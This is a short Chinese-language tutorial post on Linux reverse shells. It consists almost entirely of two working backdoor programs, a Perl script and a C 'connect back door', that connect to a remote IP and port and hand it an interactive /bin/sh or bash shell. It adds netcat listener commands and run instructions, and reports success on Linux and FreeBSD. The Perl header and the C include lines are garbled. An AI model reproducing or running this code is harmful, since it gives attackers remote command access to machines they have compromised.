linux 下反弹SHELL(一 )
#!/usr/bin/perl
-w # use
strict; use
Socket; use
I:Handle; if($#ARGV+1 !=
2){ print "$#ARGV $0 Remote_IP Remote_Port
\n"; exit 1; } my $remote_ip =
$ARGV[0]; my $remote_port =
$ARGV[1]; my $proto =
getprotobyname("tcp"); my $pack_addr = sockaddr_in($remote_port,
inet_aton($remote_ip)); my $shell = '/bin/bash
-i'; socket(SOCK, AF_INET, SOCK_STREAM,
$proto); STDOUT->autoflush(1); SOCK->autoflush(1); connect(SOCK,$pack_addr) or die "can not
connect:$!"; open STDIN,
"
">&SOCK"; open STDERR,
">&SOCK"; print "Enjoy the
shell.\n"; system($shell); close
SOCK; exit 0; 本机执行netcat.命令
nc -l -p 8080 -vv
远程:
./tcp.pl yourip 8080
perl和bash路径要自己修改,不过一般不用修改的.
文件改为755再运行.否则执行不起来
#include
#include
#include
#include
#include
#include
#include
void usage();
char shell[]="/bin/sh";
char message[]="s8s8 welcome\n";
int sock;
int main(int argc, char *argv[]) {
if(argc <3){
usage(argv[0]);
}
struct sockaddr_in server;
if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("Couldn't make socket!\n"); exit(-1);
}
server.sin_family = AF_INET;
server.sin_port = htons(atoi(argv[2]));
server.sin_addr.s_addr = inet_addr(argv[1]);
if(connect(sock, (struct sockaddr *)&server,
sizeof(struct sockaddr)) == -1) {
printf("Could not connect to remote shell!\n");
exit(-1);
}
send(sock, message, sizeof(message), 0);
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execl(shell,"/bin/sh",(char *)0);
close(sock);
return 1;
}
void usage(char *prog[]) {
printf("\t\ts8s8 connect back
door\n\n");
printf("\t sql@s8s8.net\n\n");
printf("Usage: %s
\n", prog);
exit(-1);
}
gcc -o f f.c
再在本机上监听一个端口
nc -l -p 8888
再执行./f 192.168.1.14 8888
注:反弹回来的 shell没提示符。
测试成功 Linux Freebsd